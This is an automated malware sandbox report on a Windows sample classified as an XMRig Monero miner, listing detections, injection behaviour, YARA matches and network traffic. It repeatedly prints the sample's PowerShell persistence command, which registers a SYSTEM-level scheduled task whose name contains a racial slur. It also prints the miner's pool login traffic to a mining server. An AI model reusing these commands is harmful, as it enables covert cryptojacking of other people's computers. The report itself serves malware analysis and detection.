Windows Analysis Report
SecuriteInfo.com.Win64.Evo-gen.32403.24162.exe

Overview

General Information

Sample name: SecuriteInfo.com.Win64.Evo-gen.32403.24162.exe
Analysis ID: 1394131
MD5: 7e78c4388e398cd5113be95855753c9a
SHA1: ed6abdccf206689d48cc1adac47a3a71b100d822
SHA256: 7fdcf0389689ae53b0ee7a302dc69963e7f5b3ce911b772792689b05d7f02f67
Tags: exe

Detection

Xmrig
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Yara detected Xmrig cryptocurrency miner
Detected Stratum mining protocol
Found hidden mapped module (file has been removed from disk)
Found strings related to Crypto-Mining
Injects code into the Windows Explorer (explorer.exe)
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Query firmware table information (likely to detect VMs)
Sample is not signed and drops a device driver
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Suspicious powershell command line found
Writes to foreign memory regions
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates driver files
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Tries to load missing DLLs
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

  • System is w10x64
  • powershell.exe (PID: 1412 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#zgpcu#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'MINEINEYNIGGA' /tr '''C:\Program Files\MINA\m.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\MINA\m.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'MINEINEYNIGGA' -User 'System' -RunLevel 'Highest' -Force; } MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 7120 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • m.exe (PID: 2724 cmdline: C:\Program Files\MINA\m.exe MD5: 7E78C4388E398CD5113BE95855753C9A)
    • conhost.exe (PID: 6728 cmdline: C:\Windows\System32\conhost.exe MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • explorer.exe (PID: 6444 cmdline: C:\Windows\explorer.exe MD5: 662F4F92FDE3557E86D110526BB578D5)
  • powershell.exe (PID: 4040 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#zgpcu#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'MINEINEYNIGGA' /tr '''C:\Program Files\MINA\m.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\MINA\m.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'MINEINEYNIGGA' -User 'System' -RunLevel 'Highest' -Force; } MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 5528 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • powershell.exe (PID: 4296 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#kbbksn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'MINEINEYNIGGA' /tr '''C:\Program Files\MINA\m.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\MINA\m.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'MINEINEYNIGGA' -User 'System' -RunLevel 'Highest' -Force; } MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 3304 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • m.exe (PID: 2272 cmdline: C:\Program Files\MINA\m.exe MD5: 7E78C4388E398CD5113BE95855753C9A)
  • powershell.exe (PID: 6628 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#zgpcu#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'MINEINEYNIGGA' /tr '''C:\Program Files\MINA\m.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\MINA\m.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'MINEINEYNIGGA' -User 'System' -RunLevel 'Highest' -Force; } MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 5060 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
Name: xmrig
Description: According to PCrisk, XMRIG is a completely legitimate open-source application that utilizes system CPUs to mine Monero cryptocurrency. Unfortunately, criminals generate revenue by infiltrating this app into systems without users' consent. This deceptive marketing method is called "bundling". In most cases, "bundling" is used to infiltrate several potentially unwanted programs (PUAs) at once. So, there is a high probability that XMRIG Virus came with a number of adware-type applications that deliver intrusive ads and gather sensitive information.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.xmrig
No configs have been found
Source: dump.pcap | Rule: JoeSecurity_Xmrig | Description: Yara detected Xmrig cryptocurrency miner | Author: Joe Security

Source: C:\Windows\Temp\wbiwcikhpmwr.tmp | Rule: JoeSecurity_Xmrig | Description: Yara detected Xmrig cryptocurrency miner | Author: Joe Security
Source: C:\Windows\Temp\wbiwcikhpmwr.tmp | Rule: MacOS_Cryptominer_Xmrig_241780a1 | Description: unknown | Author: unknown
  • 0x4cb268:$a1: mining.set_target
  • 0x4c6a48:$a2: XMRIG_HOSTNAME
  • 0x4c8540:$a3: Usage: xmrig [OPTIONS]
  • 0x4c6a20:$a4: XMRIG_VERSION
Source: C:\Windows\Temp\wbiwcikhpmwr.tmp | Rule: MAL_XMR_Miner_May19_1 | Description: Detects Monero Crypto Coin Miner | Author: Florian Roth
  • 0x4d1241:$x2: * COMMANDS 'h' hashrate, 'p' pause, 'r' resume
Source: C:\Windows\Temp\wbiwcikhpmwr.tmp | Rule: MALWARE_Win_CoinMiner02 | Description: Detects coinmining malware | Author: ditekSHen
  • 0x4d17a0:$s1: %s/%s (Windows NT %lu.%lu
  • 0x4d1fc8:$s3: \\.\WinRing0_
  • 0x4ca4c8:$s4: pool_wallet
  • 0x4c62d0:$s5: cryptonight
  • 0x4c62e0:$s5: cryptonight
  • 0x4c62f0:$s5: cryptonight
  • 0x4c6300:$s5: cryptonight
  • 0x4c6318:$s5: cryptonight
  • 0x4c6328:$s5: cryptonight
  • 0x4c6338:$s5: cryptonight
  • 0x4c6350:$s5: cryptonight
  • 0x4c6360:$s5: cryptonight
  • 0x4c6378:$s5: cryptonight
  • 0x4c6390:$s5: cryptonight
  • 0x4c63a0:$s5: cryptonight
  • 0x4c63b0:$s5: cryptonight
  • 0x4c63c0:$s5: cryptonight
  • 0x4c63d8:$s5: cryptonight
  • 0x4c63f0:$s5: cryptonight
  • 0x4c6400:$s5: cryptonight
  • 0x4c6410:$s5: cryptonight

Source: 0000000D.00000002.4476974328.0000000001280000.00000004.00000020.00020000.00000000.sdmp | Rule: JoeSecurity_Xmrig | Description: Yara detected Xmrig cryptocurrency miner | Author: Joe Security
Source: 00000010.00000002.2634148822.00007FF7C880B000.00000004.00000001.01000000.00000008.sdmp | Rule: JoeSecurity_Xmrig | Description: Yara detected Xmrig cryptocurrency miner | Author: Joe Security
Source: 00000010.00000002.2634148822.00007FF7C880B000.00000004.00000001.01000000.00000008.sdmp | Rule: MacOS_Cryptominer_Xmrig_241780a1 | Description: unknown | Author: unknown
  • 0x4f0388:$a1: mining.set_target
  • 0x4ebb68:$a2: XMRIG_HOSTNAME
  • 0x4ed660:$a3: Usage: xmrig [OPTIONS]
  • 0x4ebb40:$a4: XMRIG_VERSION
Source: 00000006.00000002.2224945388.00007FF7C880B000.00000004.00000001.01000000.00000008.sdmp | Rule: JoeSecurity_Xmrig | Description: Yara detected Xmrig cryptocurrency miner | Author: Joe Security
Source: 00000006.00000002.2224945388.00007FF7C880B000.00000004.00000001.01000000.00000008.sdmp | Rule: MacOS_Cryptominer_Xmrig_241780a1 | Description: unknown | Author: unknown
  • 0x4f0388:$a1: mining.set_target
  • 0x4ebb68:$a2: XMRIG_HOSTNAME
  • 0x4ed660:$a3: Usage: xmrig [OPTIONS]
  • 0x4ebb40:$a4: XMRIG_VERSION
(3 further memory-dump entries are not included in this export)

Source: 16.2.m.exe.7ff7c8830120.1.raw.unpack | Rule: JoeSecurity_Xmrig | Description: Yara detected Xmrig cryptocurrency miner | Author: Joe Security
Source: 16.2.m.exe.7ff7c8830120.1.raw.unpack | Rule: MacOS_Cryptominer_Xmrig_241780a1 | Description: unknown | Author: unknown
  • 0x4cb268:$a1: mining.set_target
  • 0x4c6a48:$a2: XMRIG_HOSTNAME
  • 0x4c8540:$a3: Usage: xmrig [OPTIONS]
  • 0x4c6a20:$a4: XMRIG_VERSION
Source: 16.2.m.exe.7ff7c8830120.1.raw.unpack | Rule: MAL_XMR_Miner_May19_1 | Description: Detects Monero Crypto Coin Miner | Author: Florian Roth
  • 0x4d1241:$x2: * COMMANDS 'h' hashrate, 'p' pause, 'r' resume
Source: 16.2.m.exe.7ff7c8830120.1.raw.unpack | Rule: MALWARE_Win_CoinMiner02 | Description: Detects coinmining malware | Author: ditekSHen
  • 0x4d17a0:$s1: %s/%s (Windows NT %lu.%lu
  • 0x4d1fc8:$s3: \\.\WinRing0_
  • 0x4ca4c8:$s4: pool_wallet
  • 0x4c62d0:$s5: cryptonight
  • 0x4c62e0:$s5: cryptonight
  • 0x4c62f0:$s5: cryptonight
  • 0x4c6300:$s5: cryptonight
  • 0x4c6318:$s5: cryptonight
  • 0x4c6328:$s5: cryptonight
  • 0x4c6338:$s5: cryptonight
  • 0x4c6350:$s5: cryptonight
  • 0x4c6360:$s5: cryptonight
  • 0x4c6378:$s5: cryptonight
  • 0x4c6390:$s5: cryptonight
  • 0x4c63a0:$s5: cryptonight
  • 0x4c63b0:$s5: cryptonight
  • 0x4c63c0:$s5: cryptonight
  • 0x4c63d8:$s5: cryptonight
  • 0x4c63f0:$s5: cryptonight
  • 0x4c6400:$s5: cryptonight
  • 0x4c6410:$s5: cryptonight
Source: 6.2.m.exe.7ff7c8830120.1.unpack | Rule: JoeSecurity_Xmrig | Description: Yara detected Xmrig cryptocurrency miner | Author: Joe Security
(27 further unpacked-PE entries are not included in this export)

System Summary

Source: Process started | Author: Jonathan Cheong, oscd.community | Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#zgpcu#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'MINEINEYNIGGA' /tr '''C:\Program Files\MINA\m.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\MINA\m.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'MINEINEYNIGGA' -User 'System' -RunLevel 'Highest' -Force; }, CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#zgpcu#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'MINEINEYNIGGA' /tr '''C:\Program Files\MINA\m.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\MINA\m.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'MINEINEYNIGGA' -User 'System' -RunLevel 'Highest' -Force; }, CommandLine|base64offset|contains: [, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#zgpcu#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'MINEINEYNIGGA' /tr '''C:\Program Files\MINA\m.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\MINA\m.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'MINEINEYNIGGA' -User 'System' -RunLevel 'Highest' -Force; }, ProcessId: 1412, ProcessName: powershell.exe
Source: Process started | Author: Jonathan Cheong, oscd.community | Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#zgpcu#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'MINEINEYNIGGA' /tr '''C:\Program Files\MINA\m.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\MINA\m.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'MINEINEYNIGGA' -User 'System' -RunLevel 'Highest' -Force; }, CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#zgpcu#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'MINEINEYNIGGA' /tr '''C:\Program Files\MINA\m.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\MINA\m.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'MINEINEYNIGGA' -User 'System' -RunLevel 'Highest' -Force; }, CommandLine|base64offset|contains: [, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#zgpcu#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'MINEINEYNIGGA' /tr '''C:\Program Files\MINA\m.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\MINA\m.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'MINEINEYNIGGA' -User 'System' -RunLevel 'Highest' -Force; }, ProcessId: 1412, ProcessName: powershell.exe
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#zgpcu#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'MINEINEYNIGGA' /tr '''C:\Program Files\MINA\m.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\MINA\m.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'MINEINEYNIGGA' -User 'System' -RunLevel 'Highest' -Force; }, CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#zgpcu#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'MINEINEYNIGGA' /tr '''C:\Program Files\MINA\m.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\MINA\m.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'MINEINEYNIGGA' -User 'System' -RunLevel 'Highest' -Force; }, CommandLine|base64offset|contains: [, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#zgpcu#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'MINEINEYNIGGA' /tr '''C:\Program Files\MINA\m.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\MINA\m.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'MINEINEYNIGGA' -User 'System' -RunLevel 'Highest' -Force; }, ProcessId: 1412, ProcessName: powershell.exe
No Snort rule has matched

AV Detection

Source: SecuriteInfo.com.Win64.Evo-gen.32403.24162.exe | Avira: detected
Source: http://pesterbdd.com/images/Pester.png | URL Reputation: Label: malware
Source: C:\Program Files\MINA\m.exe | Avira: detection malicious, Label: HEUR/AGEN.1329646
Source: C:\Program Files\MINA\m.exe | ReversingLabs: Detection: 52%
Source: C:\Program Files\MINA\m.exe | Virustotal: Detection: 62%
Source: C:\Windows\Temp\wbiwcikhpmwr.tmp | ReversingLabs: Detection: 63%
Source: C:\Windows\Temp\wbiwcikhpmwr.tmp | Virustotal: Detection: 74%
Source: SecuriteInfo.com.Win64.Evo-gen.32403.24162.exe | ReversingLabs: Detection: 52%
Source: SecuriteInfo.com.Win64.Evo-gen.32403.24162.exe | Virustotal: Detection: 62%
Source: C:\Program Files\MINA\m.exe | Joe Sandbox ML: detected
Source: SecuriteInfo.com.Win64.Evo-gen.32403.24162.exe | Joe Sandbox ML: detected

Bitcoin Miner

Source: Yara match | File source: dump.pcap, type: PCAP
Source: Yara match | File source: 16.2.m.exe.7ff7c8830120.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 6.2.m.exe.7ff7c8830120.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 16.2.m.exe.7ff7c8830120.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 6.2.m.exe.7ff7c8830120.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 16.2.m.exe.7ff7c882c840.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 6.2.m.exe.7ff7c882c840.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 16.2.m.exe.7ff7c87f0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 6.2.m.exe.7ff7c87f0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000D.00000002.4476974328.0000000001280000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000010.00000002.2634148822.00007FF7C880B000.00000004.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.2224945388.00007FF7C880B000.00000004.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: m.exe PID: 2724, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: explorer.exe PID: 6444, type: MEMORYSTR
Source: Yara match | File source: C:\Windows\Temp\wbiwcikhpmwr.tmp, type: DROPPED
Source: global traffic | TCP traffic: 192.168.2.5:49712 -> 44.196.193.227:10128 payload: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"4bbwanzjbugvgu37civtaw4gc9vjvvxdpdg68ybfkj1bxw3abbpnw42hb9msagziqabrcnee6uafyqxmmi71wkfr3aj1ahq","pass":"","agent":"xmrig/6.19.0 (windows nt 10.0; win64; x64) libuv/1.38.0 msvc/2019","rigid":"","algo":["rx/0","cn/2","cn/r","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","cn/ccx","cn-lite/1","cn-heavy/0","cn-heavy/tube","cn-heavy/xhv","cn-pico","cn-pico/tlo","cn/upx2","cn/gpu","cn/1","rx/wow","rx/arq","rx/graft","rx/sfx","rx/keva","argon2/chukwa","argon2/chukwav2","argon2/ninja","ghostrider"]}}
Source: m.exe, 00000006.00000002.2224945388.00007FF7C880B000.00000004.00000001.01000000.00000008.sdmp | String found in binary or memory: losestratum+tcp://
Source: m.exe, 00000006.00000002.2224945388.00007FF7C880B000.00000004.00000001.01000000.00000008.sdmp | String found in binary or memory: cryptonight/0
Source: m.exe, 00000006.00000002.2224945388.00007FF7C880B000.00000004.00000001.01000000.00000008.sdmp | String found in binary or memory: -o, --url=URL URL of mining server
Source: m.exe, 00000006.00000002.2224945388.00007FF7C880B000.00000004.00000001.01000000.00000008.sdmp | String found in binary or memory: Usage: xmrig [OPTIONS]
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.32403.24162.exe | Directory created: C:\Program Files\MINA
Source: C:\Program Files\MINA\m.exe | Directory created: C:\Program Files\Google\Libs
Source: SecuriteInfo.com.Win64.Evo-gen.32403.24162.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb | source: m.exe, 00000006.00000002.2224945388.00007FF7C880B000.00000004.00000001.01000000.00000008.sdmp

Networking

Source: C:\Windows\explorer.exe | Network Connect: 44.196.193.227 10128
Source: global traffic | TCP traffic: 192.168.2.5:49712 -> 44.196.193.227:10128
Source: Joe Sandbox View | IP Address: 44.196.193.227
Source: Joe Sandbox View | ASN Name: AMAZON-AESUS
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | DNS traffic detected: queries for: gulf.moneroocean.stream
Source: m.exe, 00000006.00000002.2224945388.00007FF7C880B000.00000004.00000001.01000000.00000008.sdmp | String found in binary or memory: http://crl.globalsign.net/ObjectSign.crl0
Source: m.exe, 00000006.00000002.2224945388.00007FF7C880B000.00000004.00000001.01000000.00000008.sdmp | String found in binary or memory: http://crl.globalsign.net/Root.crl0
Source: m.exe, 00000006.00000002.2224945388.00007FF7C880B000.00000004.00000001.01000000.00000008.sdmp | String found in binary or memory: http://crl.globalsign.net/RootSignPartners.crl0
Source: m.exe, 00000006.00000002.2224945388.00007FF7C880B000.00000004.00000001.01000000.00000008.sdmp | String found in binary or memory: http://crl.globalsign.net/primobject.crl0
Source: powershell.exe, 00000002.00000002.2076905736.000002AF2D190000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000007.00000002.2122566660.000001F7BE869000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000002.00000002.2059585880.000002AF1D349000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2122566660.000001F7BE869000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000002.00000002.2059585880.000002AF1D121000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000002.00000002.2059585880.000002AF1D349000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2122566660.000001F7BE869000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 00000007.00000002.2122566660.000001F7BE869000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000002.00000002.2081964848.000002AF357A3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.microsoft.co
Source: powershell.exe, 00000002.00000002.2059585880.000002AF1D121000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000007.00000002.2122566660.000001F7BE869000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/winsvr-2022-pshelp
Source: powershell.exe, 00000002.00000002.2076905736.000002AF2D190000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000002.00000002.2076905736.000002AF2D190000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000002.00000002.2076905736.000002AF2D190000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000007.00000002.2122566660.000001F7BE869000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000002.00000002.2076905736.000002AF2D190000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe
Source: m.exe, 00000006.00000002.2224945388.00007FF7C880B000.00000004.00000001.01000000.00000008.sdmp | String found in binary or memory: https://xmrig.com/docs/algorithms

System Summary

Source: 16.2.m.exe.7ff7c8830120.1.raw.unpack, type: UNPACKEDPE | Matched rule: MacOS_Cryptominer_Xmrig_241780a1 | Author: unknown
Source: 16.2.m.exe.7ff7c8830120.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Monero Crypto Coin Miner | Author: Florian Roth
Source: 16.2.m.exe.7ff7c8830120.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects coinmining malware | Author: ditekSHen
Source: 6.2.m.exe.7ff7c8830120.1.unpack, type: UNPACKEDPE | Matched rule: MacOS_Cryptominer_Xmrig_241780a1 | Author: unknown
Source: 6.2.m.exe.7ff7c8830120.1.unpack, type: UNPACKEDPE | Matched rule: Detects Monero Crypto Coin Miner | Author: Florian Roth
Source: 6.2.m.exe.7ff7c8830120.1.unpack, type: UNPACKEDPE | Matched rule: Detects coinmining malware | Author: ditekSHen
Source: 16.2.m.exe.7ff7c8830120.1.unpack, type: UNPACKEDPE | Matched rule: MacOS_Cryptominer_Xmrig_241780a1 | Author: unknown
Source: 16.2.m.exe.7ff7c8830120.1.unpack, type: UNPACKEDPE | Matched rule: Detects Monero Crypto Coin Miner | Author: Florian Roth
